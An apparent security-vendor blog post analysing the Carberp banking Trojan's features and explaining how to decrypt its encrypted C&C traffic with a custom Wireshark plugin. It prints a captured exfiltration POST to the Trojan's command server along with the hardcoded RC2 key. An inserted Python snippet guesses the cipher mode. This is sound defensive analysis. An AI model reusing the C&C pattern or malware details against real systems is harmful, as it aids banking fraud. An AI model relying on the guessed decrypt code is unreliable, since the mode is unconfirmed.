
Decrypting Carberp C&C communication

Carberp is a banking Trojan discovered relatively recently (2010). Although it is not as well known as the currently dominant banking Trojans such as ZeuS or SpyEye, we cannot simply ignore it: its powerful capabilities may bring it greater success in the future. The main characteristics of Carberp are:
  • It comes with three plugins: MiniAV, StopAV and Passw. MiniAV is a generic mini-antivirus designed to kill specific Trojans or other uncategorized, possibly malicious applications that have been heuristically classified as malware. It includes a disinfection mechanism against ZeuS, Adrenalin, Limbo, Barracuda and BlackEnergy. A malicious application containing a built-in mini-antivirus is nothing new; we have seen it before with Tatanga as well. The purpose of the StopAV plugin is to take out (kill) various antivirus products, while the Passw plugin contains password-stealing functionality for various applications (FTP, POP3, passwords from the Windows registry…).
  • It has a very sophisticated installation mechanism, which includes remote code injection into the default web browser and into svchost.exe, and it contains a payload that tries to exploit an operating system vulnerability (MS08-025). This executes code in the kernel that restores various system hooks used by security applications, thereby concealing the Trojan.
  • Together with its backdoor functionality and HTML injection, it is able to perform Man-in-the-Browser attacks against its victims.
Recent variants of Carberp encrypt their communication with the C&C, which makes further observation and monitoring of the Trojan a more complex task. A Wireshark dissector plugin customized for this purpose comes in very handy. You can download it from here together with an example .pcap file; the source code is also included (however, it has only been tested with the 32-bit version of Wireshark).


In the screenshot above we can see the plugin in action as the Trojan receives an "updateconfig" command from its C&C server. Installing the plugin is simple: we just have to put it into the "plugins" directory inside Wireshark's folder. To verify that the plugin has loaded correctly, check that it appears in the list under the menu Analyze/Enabled Protocols:


There is one more thing to look at that we have not mentioned yet: the algorithm Carberp uses to encrypt its traffic. Here is a captured POST:

POST /clssvoarsm.phtm HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sandravsxpanel.cz.cc
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 691
cchq=KRQ55AVXERssj8SabRbGQFPODZUhZxjdZY9QgPAaGwhjb1%2FEqCdQneoEfXMET
LcYNneVMlpNcMSCwEFGLhSABClbFY8G5AZak5JOk4l8JY1UiZzgmSQWdJFmFYFw77u29
7TRAoJWs4k7zgCKRrwudgtxbdiP62OJOiKSyJ0OCd75ZmYKP4uLo1h3nPT%2BNLn2Zdr
amAU31TfsdLmbf4F%2F3lo%2FS3d00bdbzGZC4oYSIu8Ci9Qw6WCISy8LBBX1LFBS3Y7
S5A633XS5GVyylgvwDCPC%2Fsp47pBFRWa%2Bblnq4NkUnkkyszrnFxgxFfO76kVfzSz
FZAC8xcDnkrBMyr%2BRvINHn3PMdf4jGWImLFT%2BN8r8mDSAz%2FFkOJaxi7OlsiH30
6btuph1s0MG%2F1fLnxxBhsRcssrPVB4Q6VP%2BAOUaDLg26n5XhMbHskphPkhDTyIPZ
lc9LPsAfMG4dfd9PhOGzBJFH9kaAb2kC4WDtU%2BnZcuYoH2advviTm9wtcz4ZASW5kx
HPgkVw9uP73fnNEs1QHdGB57V9G57bd2qdmoZ%2BOojFrtOilpizUQ9cxBvl7nGj%2Bs
%2FuAPWVV%2FXOb1tyoMmtHmSY0BqoXzksdaK2%2FDU%2BGUfkDgV95MiLXd%2FG6hXe
5zXAEXH54ji

The first and last four bytes of the message (marked in red in the original screenshot) are needed to initialize the decryption, and they are randomly generated for each POST. The data between them is RC2-encrypted and base64 encoded. Apart from these randomly generated "short" keys, which total 8 bytes, there is a "long" key of 16 bytes that is hardcoded inside the binary, and we need to extract it. Fortunately it is not that hard to spot:


By taking a memory dump of the malware and loading it into a disassembler, we can spot the right function by looking for the hash value "618ADDBEh". The purpose of this hash is not clear; most probably the value belongs to a default decryption key. In any case, our "long" key is "rsg7?GhdHB16_Rbf", but we still have to XOR every byte with the value 05 to get the final key, wvb2zBmaMG43ZWgc.
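As an added example (not code from this article or from S21sec's plugin), the following Python reproduces the two pieces the text describes: deriving the working key from the hardcoded one with the per-byte XOR 05, and separating the random 4-byte head and tail from the base64 body of a cchq POST. The "?" in the article's rendering of the raw key stands for a non-printable byte; 0x7F is the only value that XORs with 0x05 to the 'z' of the final key, so that is what the constant below uses. The page does not say which RC2 mode is used or how the 8 random bytes are combined with the 16-byte key, so rc2_decrypt is an assumption (RC2-CBC with the 8 random bytes as IV, via pycryptodome, which is not a dependency the page mentions); the POST body used in the demo is constructed, not captured traffic.

```python
import base64
from urllib.parse import quote, unquote

# Hard-coded "long" key as found in the binary. The article prints the fifth
# byte as "?" because it is not printable; 0x7F is the only byte that XORs
# with 0x05 to the 'z' of the final key wvb2zBmaMG43ZWgc.
RAW_LONG_KEY = b"rsg7\x7fGhdHB16_Rbf"
KEY_XOR = 0x05        # per-byte XOR applied to the raw key (from the article)
SHORT_KEY_LEN = 4     # random bytes at the start and at the end of the message


def derive_long_key(raw_key: bytes, xor_value: int = KEY_XOR) -> bytes:
    """Apply the per-byte XOR the article describes to the raw 16-byte key."""
    if len(raw_key) != 16:
        raise ValueError("Carberp long key is 16 bytes")
    return bytes(b ^ xor_value for b in raw_key)


def _b64decode_lenient(text: str) -> bytes:
    """Standard base64 decode that re-adds any '=' padding a capture may lack."""
    text = text.strip()
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text, validate=True)


def split_cchq(body: str) -> tuple:
    """Split a 'cchq=...' POST body into (head, rc2_ciphertext, tail).

    Assumption: head and tail are the first/last four characters of the
    URL-decoded cchq value (the bytes the article marks in red) and the text
    between them is standard base64. Wrapped capture lines are joined first.
    """
    if not body.startswith("cchq="):
        raise ValueError("not a Carberp cchq POST body")
    value = unquote(body[len("cchq="):].replace("\n", "").replace("\r", ""))
    if len(value) < 2 * SHORT_KEY_LEN + 4:
        raise ValueError("cchq value too short")
    head = value[:SHORT_KEY_LEN].encode("ascii")
    tail = value[-SHORT_KEY_LEN:].encode("ascii")
    ciphertext = _b64decode_lenient(value[SHORT_KEY_LEN:-SHORT_KEY_LEN])
    return head, ciphertext, tail


def build_cchq(ciphertext: bytes, head: bytes, tail: bytes) -> str:
    """Inverse of split_cchq; used here only to construct test traffic.

    safe="" makes quote() encode '/' and '+' as %2F and %2B, as in the capture.
    """
    if len(head) != SHORT_KEY_LEN or len(tail) != SHORT_KEY_LEN:
        raise ValueError("head and tail must be 4 bytes each")
    value = head.decode("ascii") + base64.b64encode(ciphertext).decode("ascii") + tail.decode("ascii")
    return "cchq=" + quote(value, safe="")


def rc2_decrypt(key: bytes, head: bytes, tail: bytes, ciphertext: bytes) -> bytes:
    """RC2 decryption of the body (assumed mode; needs pycryptodome).

    Assumption: the two 4-byte random values are joined into the 8-byte IV of
    RC2-CBC. The article only says they "initialize the decryption".
    """
    from Crypto.Cipher import ARC2  # pip install pycryptodome (assumed dependency)
    if len(ciphertext) % 8:
        raise ValueError("RC2 ciphertext must be a multiple of the 8-byte block")
    return ARC2.new(key, ARC2.MODE_CBC, iv=head + tail).decrypt(ciphertext)


if __name__ == "__main__":
    key = derive_long_key(RAW_LONG_KEY)
    print("final key:", key.decode("ascii"))
    # Constructed message: 24 bytes of pretend ciphertext between two random-looking 4-byte values.
    demo_body = build_cchq(b"\xfb\xff\xbf" * 8, b"KRQ5", b"54ji")
    print("constructed body:", demo_body)
    head, ct, tail = split_cchq(demo_body)
    print("head/tail:", head, tail, "ciphertext bytes:", len(ct))
```

The key derivation and framing are taken from the article; only the decrypt step is a labelled guess, which is why it is isolated in its own function so it can be replaced once the mode and key combination are confirmed from the binary.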


Once we have the key, we have to pass it to the plugin to make it work: it goes under the menu Edit/Preferences/Protocols, and that's all, ready to sniff an infected machine ;)

Jozsef Gegeny
S21sec e-crime

2 comments:

Nick Enukov said...

Good day!
The link to the Wireshark plug-in does not work.
May I ask you to update it?
Thank you very much

Ion said...

We have updated it, sorry for the inconvenience.



© Copyright S21sec 2013 - All rights reserved